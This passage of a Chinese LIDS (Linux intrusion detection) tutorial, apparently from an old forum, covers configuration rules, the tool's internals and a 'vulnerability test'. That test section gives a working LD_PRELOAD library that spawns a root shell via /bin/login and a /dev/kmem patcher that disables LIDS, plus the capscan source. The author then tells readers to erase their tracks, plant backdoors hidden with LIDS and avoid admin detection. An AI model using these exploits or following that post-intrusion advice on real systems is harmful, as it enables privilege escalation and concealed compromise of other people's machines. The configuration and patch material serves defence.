MAIL_SWITCH=1
# MAIL_RELAY=hex IP:port
# IP11.1 of the machine that will be directly connected by LIDS
# for relaying its mails. Port is usually 25, but who knows...
MAIL_RELAY=192.168.100.171:25
# MAIL_SOURCE=source machine :
# Name of the source machine, used for the ehlo identification.
# Note that a bad name here could make the mail relay refuse your
# mails.
MAIL_SOURCE=lids.xfocus.net
---------------------------------------------------------------------------
配置好的系统重新启动后,不要忘记用lidsadm封装内核,在最后/etc/rc.local加入以下命令
# /sbin/lidsadm -I
重新启动,如果要关闭lids系统启动,你可以在lilo里用security=0来启动内核。
配置中要注意的几点:
*. 启动
在启动的时候更新文件:
一些文件需要在系统启动的时候写,但是会被LIDS保护,这些文件一般保存在/var目录下,但是也有一些例外: modules.dep:除了增加或是删除模块外,不需要在启动的时候更改,可以禁止它在启动的时候更新。
mtab:用-n的选项在每次启动的时候生成一个从/etc/mtab到/proc/mounts的一个连接。如果对/etc/目录进行保护,那么在启动中可能因为mtab不可写而导致启动失败,因此需要将启动脚本中的mount加-n选项,或者单独对/etc下的几个重要目录或文件进行保护。
*. 关机或重起
可能会因为lids.conf配置引起关机是无法umount文件系统,导致重起后检查硬盘文件系统。
所以在lids.conf必须对halt进行配置:
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_INIT_KILL -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_KILL -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_NET_ADMIN -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_ADMIN -i 1 -j GRANT
*.针对隐藏的进程,因为进程隐藏所以关机的时候无法停止隐藏进程,导致不能正确的umount文件系统,重起的时候会对硬盘进行检查,使启动时间加长,所以在隐藏进程后,要对隐藏的进程的停止脚本加以修改。
例如隐藏了httpd进程后,需要修改/etc/rc.d/init.d/httpd杀死隐藏进程
...
stop() {
echo -n "Shutting down http: "
kill -15 `cat /var/run/httpd.pid`
sleep 5
#killproc httpd
RETVAL=$?
echo
[ $RETVAL = 0 ] && rm -f /var/lock/subsys/httpd /var/run/httpd.pid
}
...
[目录]
--------------------------------------------------------------------------------
测试
[目录]
--------------------------------------------------------------------------------
功能测试
1.功能测试:
配置脚本:
---------------------------------------------------------------------------------
#!/bin/sh
# Flush old rules
/sbin/lidsconf -Z
# Protect/etc/lids
/sbin/lidsconf -A -o /etc/lids -j DENY
# Protect System Binaries
/sbin/lidsconf -A -o /sbin -j READONLY
/sbin/lidsconf -A -o /bin -j READONLY
# Protect all of /usr and /usr/local
/sbin/lidsconf -A -o /usr -j READONLY
/sbin/lidsconf -A -o /usr/local -j READONLY
# Protect the System Libraries
/sbin/lidsconf -A -o /lib -j READONLY
# Protect System Configuration files
/sbin/lidsconf -A -o /etc/rc.d -j READONLY
/sbin/lidsconf -A -o /etc/rc0.d -j READONLY
/sbin/lidsconf -A -o /etc/rc1.d -j READONLY
/sbin/lidsconf -A -o /etc/rc2.d -j READONLY
/sbin/lidsconf -A -o /etc/rc3.d -j READONLY
/sbin/lidsconf -A -o /etc/rc4.d -j READONLY
/sbin/lidsconf -A -o /etc/rc5.d -j READONLY
/sbin/lidsconf -A -o /etc/rc6.d -j READONLY
/sbin/lidsconf -A -o /etc/init.d -j READONLY
/sbin/lidsconf -A -o /etc/rc.local -j READONLY
/sbin/lidsconf -A -o /etc/rc.sysinit -j READONLY
/sbin/lidsconf -A -o /etc/sysconfig -j READONLY
/sbin/lidsconf -A -o /etc/hosts -j READONLY
/sbin/lidsconf -A -o /etc/hosts.allow -j READONLY
/sbin/lidsconf -A -o /etc/hosts.deny -j READONLY
/sbin/lidsconf -A -o /etc/passwd -j READONLY
/sbin/lidsconf -A -o /etc/shadow -j DENY
/sbin/lidsconf -A -o /etc/lilo.conf -j DENY
# Enable system authentication
/sbin/lidsconf -A -s /bin/login -o /etc/shadow -j READONLY
/sbin/lidsconf -A -s /bin/su -o /etc/shadow -j READONLY
/sbin/lidsconf -A -s /bin/su -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -s /bin/su -o CAP_SETGID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_SETGID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_CHOWN -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT
# Protect the boot partition
/sbin/lidsconf -A -o /boot -j READONLY
# Protect root's home dir, but allow bash history
/sbin/lidsconf -A -o /root -j READONLY
/sbin/lidsconf -A -s /bin/bash -o /root/.bash_history -j WRITE
# Protect system logs
/sbin/lidsconf -A -o /var/log -j APPEND
/sbin/lidsconf -A -o /var/log/dmesg -j WRITE
/sbin/lidsconf -A -s /bin/login -o /var/log/wtmp -j WRITE
/sbin/lidsconf -A -s /bin/login -o /var/log/lastlog -j WRITE
/sbin/lidsconf -A -s /sbin/init -o /var/log/wtmp -j WRITE
/sbin/lidsconf -A -s /sbin/init -o /var/log/lastlog -j WRITE
/sbin/lidsconf -A -s /sbin/halt -o /var/log/wtmp -j WRITE
/sbin/lidsconf -A -s /sbin/halt -o /var/log/lastlog -j WRITE
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/wtmp -i 1 -j WRITE
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/lastlog -i 1 -j WRITE
# Shutdown
/sbin/lidsconf -A -s /sbin/init -o CAP_INIT_KILL -j GRANT
/sbin/lidsconf -A -s /sbin/init -o CAP_KILL -j GRANT
# Give the following init script the proper privileges to kill processes and
# unmount the file systems. However, anyone who can execute these scripts
# by themselves can effectively kill your processes. It's better than
# the alternative, however.
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_INIT_KILL -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_KILL -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_NET_ADMIN -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_ADMIN -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_RAWIO -i 1 -j GRANT
# Other
/sbin/lidsconf -A -s /sbin/update -o CAP_SYS_ADMIN -j GRANT
/sbin/lidsconf -A -s /sbin/consoletype -o CAP_SYS_ADMIN -j GRANT
#Protect and hide Httpd
/sbin/lidsconf -A -o /etc/httpd -j DENY
/sbin/lidsconf -A -s /usr/sbin/httpd -o /etc/httpd -j READONLY
/sbin/lidsconf -A -s /usr/sbin/httpd -o CAP_HIDDEN -j GRANT
---------------------------------------------------------------------------------
运行命令/sbin/lidsadm -S -- -LIDS切换到不受lids保护的状态,然后执行配置脚本,运行命令/sbin/lidsadm -S -- +RELOAD_CONF,更新lids配置,最后lidsadm -S -- +LIDS切换到lids保护状态
通过命令如ls /etc/shadow、ls /etc/lids、touch /sbin/x、ps ax|grep http等命令测试lids保护的文件、目录和进程等;通过扫描器扫描测试lids的检测功能以及lids的响应功能等。最好的办法是模仿黑客成功入侵后所做的活动,如装rootkit等来检验lids的主要功能。
[目录]
--------------------------------------------------------------------------------
漏洞测试
2.漏洞测试:
LD_PRELOAD能够编写一个LIDS可执行任意代码的程序,这意味着入侵者能够获得LIDS配置下的权限和文件访问能力,如果用CAP_SYS_RAWIO 或者CAP_SYS_MODULE,入侵者可以停掉LIDS并且获得访问一切文件的权限。 在某些配置下,还能够获得root权限。
可以到下载下面的测试程序:
[url]http://www.lids.org/download/test-lids.sh[/url]
[url]http://www.lids.org/download/test-lids.sh.asc[/url]
下面开始入侵装有lids的linux,当然该lids是有bug的了。
首先是获得一个普通帐号了,通过finger、sendmail等或是社交工程都可以,相信难不倒各位,只要有个帐号就可以,当然还需要能够远程登录,如果能本机登录就更好了!
[test@rh72 test]$ls /proc/sys
abi debug dev fs kernel lids net proc
[test@rh72 test]$ls /sbin/lids*
/sbin/lidsadm /sbin/lidsconf
--可见该系统安装了lids
[test@rh72 test]$vi testlids.sh
---------------------------------------------------------------------------------
#!/bin/sh
# Creates /tmp/boom.so you might
# use to let LIDS leak capabilities
# to your shell.
cat>/tmp/boom.c<<_EOF_;
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
_init()
{
char *a[] = {"/bin/bash", NULL};
setuid(0);
close(0);close(1);close(2);
open("/dev/tty", O_RDWR);
dup(0);
dup(1);
execve(*a,a,NULL);
return -1;
}
_EOF_
cc -c -fPIC /tmp/boom.c -o /tmp/boom.o
ld -Bshareable /tmp/boom.o -o /tmp/boom.so
echo "OK";
---------------------------------------------------------------------------------
[test@rh72 test]$ chmod +x testlids.sh
[test@rh72 test]$ ./testlids.sh
OK
[test@fire lids]$ LD_PRELOAD=/tmp/boom.so /bin/login
[root@fire lids]# whoami
root
哇塞,这么容易就获得root权限了,比没有装lids的linux更容易,真爽!:)
可见,普通用户通过LD_PRELOAD可以直接从装有存在bug的lids的系统中获得超级用户权限,所以安装lids的管理员一定要注意升级和配置lids。
(之所以通过/bin/login直接获得root权限是因为采用如下的lids配置命令
/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_SETGID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_CHOWN -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT )
[root@fire lids]# ./capscan -b (capscan用来探测lids的功能约束)
b 5 CAP_KILL
[root@fire lids]# touch /sbin/xlids
touch: /sbin/xlids: Operation not permitted
[root@fire lids]#LD_PRELOAD=/tmp/boom.so /etc/rc.d/init.d/halt
[root@fire lids]# ./capscan -b
b 5 CAP_KILL
b 12 CAP_NET_ADMIN
b 17 CAP_SYS_RAWIO
b 21 CAP_SYS_ADMIN
b 27 CAP_MKNOD
--可见我们已经从halt脚本获得了CAP_NET_ADMIN、CAP_SYS_RAWIO和CAP_SYS_ADMIN功能
[root@fire lids]# touch /sbin/xlids
touch: /sbin/xlids: Operation not permitted
[root@fire lids]# ls -al /etc/lids
ls: /etc/lids: No such file or directory
[root@fire lids]# /sbin/lidsconf -L
LIST
LIDS: lidsconf(dev 3:1 inode 150018) pid 630 ppid 581 uid/gid (0/0) on (vc/1):
access hidden file /etc/lids/lids.conf
lidsconf:cannot open /etc/lids/lids.conf
reason: No such file or directory
--可见lids仍起作用,并对/sbin和/etc/lids作了保护,其中/sbin作了只读保护,/etc/lids拒绝访问
[root@fire lids]#vi lidsoff.c
---------------------------------------------------------------------------------
#lidsoff.c: //主要是将内核中的变量lids_load置为0
/* Simple and stupid kmem patcher for LIDS.
* Licensed under the GPL. :-)
*/
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
void die(const char *s)
{
perror(s);
exit(errno);
}
int main(int argc, char **argv)
{
char zero;
off_t off;
int kmem;
if (argc < 2) {
printf("Usage: %s <addr-of-lids_local_on-in-hex>\n\n", *argv);
return 1;
}
kmem = open("/dev/kmem", O_RDWR);
if (kmem < 0)
die("open");
off = strtoul(argv[1], 0, 16);
printf("# Patching [%x]\n", off-4);
lseek(kmem, off-4, SEEK_SET);
read(kmem, &zero, sizeof(zero));
printf("%d -> 0\n", zero);
lseek(kmem, off-4, SEEK_SET);
zero = 0;
write(kmem, &zero, sizeof(zero));
close(kmem);
return 0;
}
---------------------------------------------------------------------------------
[root@fire lids]# gcc -o lidsoff lidsoff.c
[root@fire lids]# grep lids /proc/ksyms
c0113868 lids_send_message_Rsmp_ccaa3a65
c029af60 lids_load_Rsmp_a57ab5ad
c029af64 lids_local_on_Rsmp_641824fe
c029af6c lids_local_pid_Rsmp_2a2dd337
c0129270 lids_local_off_Rsmp_445f75c1
[root@fire lids]# ./lidsoff
Usage: ./lidsoff <addr-of-lids_local_on-in-hex>
[root@fire lids]# ./lidsoff c029af64
# Patching [c029af60]
1 -> 0
哈哈, lids已经关闭了,不再起作用了!
[root@fire lids]# ls /etc/lids/lids.conf
/etc/lids/lids.conf
[root@fire lids]# touch /sbin/xlids
至此,已经完全控制了装有lids的linux,很easy是吧,最后别忘了擦脚印、装后门。当然可以利用lids隐藏后门程序目录和进程了,连rootkit都可以省了。完事后切换lids的状态,不然管理员很容易就发现入侵了。不过受害机器的控制台上可能会有一些警告显示,最好是重起或者用一些扫描信息替换掉!
[目录]
--------------------------------------------------------------------------------
附录
lids解决办法:
对于2.4用户:
[url]http://www.lids.org/download/lids-1.1.1pre...2-2.4.16.tar.gz[/url]
[url]http://www.lids.org/download/lids-1.1.1pre...4.16.tar.gz.asc[/url]
(或者lids-1.1.1pre2以后的版本)
对于2.2用户:
[url]http://www.lids.org/download/LIDS-security...-2.2.20.diff.gz[/url]
[url]http://www.lids.org/download/LIDS-security....20.diff.gz.asc[/url]
(或者lids-0.11.0以后的版本)
附capscan 源程序:
--------------[ stealth <[email]stealth@segfault.net[/email]> ]--------------------------------
#cap.h
---------------------------------------------------------------------------------
#ifndef __cap_h__
#define __cap_h__
#include <linux/capability.h>
typedef struct __user_cap_header_struct cap_user_header;
typedef struct __user_cap_data_struct cap_user_data;
int capget(cap_user_header_t,cap_user_data_t);
int capset(cap_user_header_t,cap_user_data_t);
int print_cap(cap_user_data_t, cap_user_data_t);
int brute_caps();
#endif
---------------------------------------------------------------------------------
# cap.c
---------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <linux/module.h>
#include <errno.h>
#include <sys/ptrace.h>
#include <sys/stat.h>
#include "cap.h"
extern int wait(int *);
int try_chown()
{
char p[] = "/tmp/fooXXXXXX";
int r, fd = mkstemp(p);
if (fd < 0)
return 0;
close(fd);
/* try a give-away */
if (chown(p, getuid()+1, getgid()+1) < 0)
r = 0;
else
r = 1;
unlink(p);
return r;
}
int try_setuid()
{
int euid = geteuid();
if (seteuid(euid + 1) < 0)
return 0;
seteuid(euid);
return 1;
}
int try_setgid()
{
int egid = getegid();
if (setegid(egid + 1) < 0)
return 0;
setegid(egid);
return 1;
}
int try_kill()
{
/* XXX: suffices? */
if (kill(1, SIGCONT) < 0)
return 0;
return 1;
}
int try_bind()
{
struct sockaddr_in sin;
int r, fd = socket(PF_INET, SOCK_STREAM, 0);
if (fd < 0)
return 0;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(666);
if (bind(fd, (struct sockaddr*)&sin, sizeof(sin)) < 0)
r = 0;
else
r = 1;
close(fd);
return r;
}
int try_net_raw()
{
int fd = socket(PF_INET, SOCK_RAW, 0);
if (fd >= 0) {
close(fd);
return 1;
}
return 0;
}
int try_nice()
{
return (nice(-1) == 0);
}
extern caddr_t create_module(const char *, size_t);
int try_module()
{
errno = 0;
create_module("adore", 1234);
delete_module("adore");
return (errno == 0);
}
int try_chroot()
{
int r;
if (fork() == 0) {
if (chroot("/tmp") < 0)
exit(0);
else
exit(1);
}
wait(&r);
return r != 0;
}
int try_rawio()
{
int fd = open("/dev/kmem", O_RDONLY);
if (fd < 0)
return 0;
close(fd);
return 1;
}
int try_admin()
{
char h[1024];
memset(h, 0, sizeof(h));
gethostname(h, sizeof(h));
if (sethostname("hola!", 5) < 0)
return 0;
sethostname(h, strlen(h));
return 1;
}
int try_net_admin()
{
int sock;
struct ifreq ifr;
strcpy(ifr.ifr_name, "lo");
if ((sock = socket(PF_INET, SOCK_DGRAM, 0)) < 0)
return 0;
if (ioctl(sock, SIOCGIFFLAGS, &ifr) < 0)
return 0;
ifr.ifr_flags &= ~IFF_UP;
if (ioctl(sock, SIOCSIFFLAGS, &ifr) < 0)
return 0;
ifr.ifr_flags |= IFF_UP;
ioctl(sock, SIOCSIFFLAGS, &ifr);
close(sock);
return 1;
}
int try_ptrace()
{
int child, r = 0;
if ((child = fork()) == 0) {
sleep(10);
exit(0);
}
if (ptrace(PTRACE_ATTACH, child, 0, 0) < 0)
r = 0;
else
r = 1;
kill(child, SIGKILL);
wait(NULL);
return r;
}
int try_mknod()
{
unlink("/tmp/fd0");
if (mknod("/tmp/fd0", 0600|S_IFCHR, 2<<8) < 0)
return 0;
unlink("/tmp/fd0");
return 1;
}
struct {
int value;
char *name;
int (*try)();
} caps[] = {
{0, "CAP_CHOWN", try_chown},
{1, "CAP_DAC_OVERRIDE", NULL},
{2, "CAP_DAC_READ_SEARCH", NULL},
{3, "CAP_FOWNER", NULL},
{4, "CAP_FSETID", NULL},
{5, "CAP_KILL", try_kill},
{6, "CAP_SETGID", try_setgid},
{7, "CAP_SETUID", try_setuid},
{8, "CAP_SETPCAP", NULL},
{9, "CAP_LINUX_IMMUTABLE", NULL},
{10, "CAP_NET_BIND_SERVICE", try_bind},
{11, "CAP_NET_BROADCAST", NULL},
{12, "CAP_NET_ADMIN", try_net_admin},
{13, "CAP_NET_RAW", try_net_raw},
{14, "CAP_IPC_LOCK", NULL},
{15, "CAP_IPC_OWNER", NULL},
{16, "CAP_SYS_MODULE", try_module},
{17, "CAP_SYS_RAWIO", try_rawio},
{18, "CAP_SYS_CHROOT", try_chroot},
{19, "CAP_SYS_PTRACE", try_ptrace},
{20, "CAP_SYS_PACCT", NULL},
{21, "CAP_SYS_ADMIN", try_admin},
{22, "CAP_SYS_BOOT", NULL},//haha :>
{23, "CAP_SYS_NICE", try_nice},
{24, "CAP_SYS_RESOURCE", NULL},
{25, "CAP_SYS_TIME", NULL},
{26, "CAP_SYS_TTY_CONFIG", NULL},
{27, "CAP_MKNOD", try_mknod},
{28, "CAP_LEASE", NULL},
{-1, (void*)0}
};
/* if (capable(d.cap_effective, CAP_SYS_MODULE)
* ...
*/
int capable(int cap, int flag)
{
return (cap & (1<<flag));
}
int print_cap(cap_user_data_t new, cap_user_data_t old)
{
int i = 0;
FILE *f;
if (!new || !old)
return -1;
f = fopen("/dev/tty", "w+");
if (!f)
return -1;
fprintf(f, "nE %x nI %x nP %x\n"
"oE %x oI %x oP %x\n\n",
new->effective, new->inheritable, new->permitted,
old->effective, old->inheritable, old->permitted);
/* Print New's advanced (effective) caps over old ones */
/* HACK! This is left here due to a private version of capcan */
for (i = 0; caps[i].value != -1; ++i) {
if (capable(new->effective, caps[i].value) &&
!capable(old->effective, caps[i].value))
fprintf(f, "e %d %s\n", caps[i].value, caps[i].name);
}
printf("\n");
/* Print New's advanced (inhertiable) caps over old ones */
for (i = 0; caps[i].value != -1; ++i) {
if (capable(new->inheritable, caps[i].value) &&
!capable(old->inheritable, caps[i].value))
fprintf(f, "i %d %s\n", caps[i].value, caps[i].name);
}
/* No news */
if (new->effective == new->permitted)
return 0;
printf("\n");
/* Print New's advanced permitted caps */
for (i = 0; caps[i].value != -1; ++i) {
if (capable(new->permitted, caps[i].value) &&
!capable(old->permitted, caps[i].value))
fprintf(f, "p %d %s\n", caps[i].value, caps[i].name);
}
fclose(f);
return 0;
}
int brute_caps()
{
int i = 0;
for (; caps[i].value != -1; ++i) {
if (caps[i].try) {
if (caps[i].try()) {
printf("b %d %s\n", caps[i].value,
caps[i].name);
}
}
}
return 0;
}
---------------------------------------------------------------------------------
#capscan.c
---------------------------------------------------------------------------------
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <dirent.h>
#include <fcntl.h>
#include "cap.h"
extern pid_t wait(int *);
void die(const char *s)
{
perror(s);
exit(errno);
}
int main(int argc, char **argv)
{
cap_user_header h;
cap_user_data d, we;
h.version = _LINUX_CAPABILITY_VERSION;
h.pid = 0;
if (argc < 2) {
fprintf(stderr, "Usage: %s [-w] [-b]\n", *argv);
exit(1);
}
/* Just print the caps we have yet */
if (argv[1][1] == 'w') {
if (capget(&h, &we) < 0)
die("capget");
memset(&d, 0, sizeof(d));
print_cap(&we, &d);
} else if (argv[1][1] == 'b') {
brute_caps();
}
return 0;
}
[目录]
--------------------------------------------------------------------------------
原理分析
随着Internet上的Linux主机的增加,越来越多的安全漏洞在当前的GNU/Linux系统上发现。你也许在Internet上听说过在Linux下发现Bug,它会导致系统很容易的被黑客攻击。
因为Linux是一个开放源代码的系统,漏洞很容易发现,并且也会很快的有补丁出来。但是当漏洞没有公布的时候,并且管理员很懒,没有去打补丁。黑客就会很容易的攻击这个系统,取得root权限,在现有的GNU/Linux下,他就可以做任何他想做的事情。现在你可以问,我们现在到底可以做些什么呢?
1、现在的GNU/Linux错误在哪里?
超级用户会滥用职权,他能够做所有他要做的事情。作为root。他会改变所有的东西。
许多系统文件很容易被更改。这些文件可能是很重要的文件,如/bin/login,如果一个黑客进入,他可以上传一个login程序来覆盖/bin/login,这样他就可以不用登陆名和密码来登陆系统。但是这些文件不需要经常改动,除非你要升级系统。
模块modules很容易用来中断内核。模块是为了让Linux内核更模块话和更高效而设计的。但是当模块加入到内核,它就会成为内核的一部分并且能做原始内核能做的工作。因此,一些不友好的代码可以写成模块来加入到内核里,这些代码就会重定向系统调用并且作为一个病毒来运行。
进程是不受保护的,一些进程,如后台的Web服务器,一直都认为是没有严格保护的程序。因此,他们就会很容易被黑客攻击。
2、LIDS的设想是什么。
保护重要文件。因为文件很容易被root更改,为什么不严格文件操作呢?因此,LIDS改变了文件系统在内核里的安全系统调用。如果某个时候一些人访问一个文件,他就会进入系统调用然后我们就可以检查文件名并且看她们是否被保护。如果它已经被保护,我们就可以拒绝这个访问者的要求。
保护重要的进程。这个和上面的保护进程的想法不是一样的。当一个系统里运行一个进程,它会在/proc 文件系统里有一个用pid作为路径名的入口。所以,如果你用"ps -axf"你就可以显示出当前运行的进程。你可以问如果保护这些进程。如果你要杀死一个进程的话,首先,你键入"ps"来得到进程的PID,然后,你键入"kill 〈pid〉"来杀死它。但是,如果我不让你看到进程,你怎么来杀死这个进程呢?因此,LIDS是用隐藏进程来保护它的。 另外一个重要的方法就是不让任何人可以杀死进程,包括root用户。LIDS能够保护父进程是init(pid=1)的所有进程 。
封装内核。有时候我们需要要把一些必要的模块加入到内核里来使用,另外,我们也要拒绝任何人包括root用户向内核插入模块。那么如何来平衡这个矛盾的问题呢?我们可以只允许在系统启动的时候插入模块,然后我们封装模块,在封装后,内核不允许任何人插入模块到内核里。通过这种封装功能,我们能用它来保护重要的文件,进程,我们可以在系统启动的时候只允许必要的进程,只改变必要的文件。在封装内核后,我们就不能在对文件有任何的修改。
[目录]
--------------------------------------------------------------------------------
保护文件
1、保护文件系统是LIDS的重要功能之一。这个功能是在内核的VFS(虚拟文件系统)层实现的,我们可以保护任何种类的文件系统,如EXT2,FAT。 在LIDS,保护的文件按种类分为以下几种:
只读的文件或目录。只读文件意味着它们不被允许改写,如,在目录/usr/bin,/sbin。这些类型的文件大多数都是二进制系统程序或是系统配置文件,除了在升级系统的时候,我们不需要改变它们。
只可增加文件或目录。这些文件是那些只可以增加大小的文件。大多数是系统的日值文件,如在/var/log里的只可增加文件。
额外的文件或目录,这些文件没有被保护。一般来说,你想要保护目录下的所有文件,但是,还需要有一些特殊的文件不要被保护。所以我们可以定义这些文件作为额外的其他的只读文件。
保护挂载或卸载文件系统。当你在启动的时候挂载文件系统的时候,你可以禁止所有人,甚至是root,去卸载文件系统。你也可以禁止任何人在当前文件系统下挂载文件系统来覆盖它。
2、LIDS如何在内核保护文件
在这部分,我们会看到一些内核的代码来理解LIDS是如何保护文件的。
(1)、Linux文件系统数据结构程序
首先,我们必须了解Linux的虚拟文件系统。
在Linux里的每一个文件,不管是什么样子的,都有一个结点inode数,文件系统提供了以下数据结构。
在/usr/src/linux/include/linux/fs.h
struct inode {
struct list_head i_hash;
struct list_head i_list;
struct list_head i_dentry;
unsigned long i_ino; ----> inode number.
unsigned int i_count;
kdev_t i_dev; ----> device number.
umode_t i_mode;
nlink_t i_nlink;
uid_t i_uid;
......
}
注意:用来鉴定一个结点inode。这个意思是你可以用一对来得到一个系统里独一无二的inode。
在/ur/src/linux/cinclude/linux/dcache.h里
struct dentry {
int d_count;
unsigned int d_flags;
struct inode * d_inode; /* Where the name belongs to - NULL is negative */
struct dentry * d_parent; /* parent directory */
struct dentry * d_mounts; /* mount information */
struct dentry * d_covers; struct list_head d_hash; /* lookup hash list */
struct list_head d_lru; /* d_count = 0 LRU list */
struct list_head d_child; /* child of parent list */
struct list_head d_subdirs; /* our
......
}
dentry是一个目录文件的入口。通过这个入口,我们可以很容易的在文件的父目录下移动。
例如,如果你一文件的inode是(struct inode*)file_inode,如果你可以用file_inode->d_entry来得到它的目录入口并且用file_inode->d_entry->d_parent来得到父目录的目录入口。
(2)、LIDS保护数据结构
在分析完linux文件系统后,让我们来看看LIDS是如何容VFS来保护文件和目录的。
在/usr/src/linux/fs/lids.c
struct secure_ino {
unsigned long int ino; /* the inode number */
kdev_t dev; /* the dev number /*
int type; /* the file type */
};
上面的结构用一对来存储保护文件或目录的结点。"type"是用来标明保护结点文件类型的。
LIDS有4种类型:
在/usr/src/linux/include/linux/fs.h
#define LIDS_APPEND 1 /* APPEND ONLY FILE */
#define LIDS_READONLY 2 /* Read Only File */
#define LIDS_DEVICE 3 /* Protect MBR Writing to device */
#define LIDS_IGNORE 4 /* Ignore the protection */
通过secure_ino结构,我们能很容易的初使化保护的文件或是在内核里执行以下函数。
在/usr/src/linux/fs/lids.c
int lids_add_inode(unsigned long int inode ,kdev_t dev , int type)
{
if ( last_secure == (LIDS_MAX_INODE-1))
return 0;
secure[last_secure].ino = inode;
secure[last_secure].dev = dev;
secure[last_secure].type = type;
secure[++last_secure].ino = 0;
#ifdef VFS_SECURITY_DEBUG
printk("lids_add_inode : return %dn",last_secure);
#endif
return last_secure;
}
就象你在上面代码上可以看到的,给secure_ino加到一个结点上是非常容易的。被保护的结点会在系统启动的时候初使化。初使化程序在/usr/src/linux/fs/lids.c的init_vfs_security()里。
现在,让我们看看LIDS是如何来检查是否一个结点已经受到保护。
在/usr/src/linux/fs/open.c
int do_truncate(struct dentry *dentry, unsigned long length)
{
struct inode *inode = dentry->d_inode;
int error;
struct iattr newattrs;
/* Not pretty: "inode->i_size" shouldn't really be "off_t". But it is. */
if ((off_t) length < 0)
return -EINVAL;
#ifdef CONFIG_LIDS
if (lids_load && lids_local_load) {
error =
lids_check_base(dentry,LIDS_READONLY);
if (error) {
lids_security_alert("Try to truncate a protected file (dev %d %d,inode %ld)",
MAJOR(dentry->d_inode->i_dev),
MINOR(dentry->d_inode->i_dev),
dentry->d_inode->i_ino);
.....................
这个是LIDS加到内核里做检测的一个例子。你会看到lids_check_base()是LIDS保护方法的一个核心函数。
你可以在LIDS要保护的地方看到很多LIDS保护方法用到lids_check_base()函数,特别是在linux内核的子目录下。
在/usr/src/linux/fs/lids.c
int lids_check_base(struct dentry *base, int flag)
{
..................
inode = base->d_inode; /* get the inode number */
parent = base->d_parent; /* get the parent diretory */
.................
----> do {
if ( inode == parent->d_inode)
break;
if ((retval = lids_search_inode(inode))) {
if ( retval == LIDS_IGNORE || (retval == LIDS_DEVICE && flag != LIDS_DEVICE)) break;
if ( flag == LIDS_READONLY || ( flag == LIDS_APPEND && retval >flag ) || ( flag == LIDS_DEVICE && flag == retval )) {
return -EROFS;
} break; }
inode = parent->d_inode;
} while( ((parent = parent->d_parent ) != NULL) );
return 0;
}
lids_check_base()会检查一个给定文件的dentry和它的父目录是否被保护。
注意:如果它的父目录被保护,它下面的文件也会被保护。
例如,如果"/etc/"被保护,"/etc/passwd"也一样被保护。
(3)、在内核保护系统调用
为了保护系统,LIDS会在一些检查临界的系统调用的时候做检查。因此,我们可以保护系统调用和限制文件系统的用户调用。
这些是一些例子:
·open(),open是通过禁止一些权利来保护文件的打开。你可以在打开调用open_namei()调用的时候LIDS在检测它。
·mknod(),mknod是用来在指定目录下保护mknod。
·unlink(),在内核代码检查do_unlink()。
[目录]
--------------------------------------------------------------------------------
保护设备
页:
[1]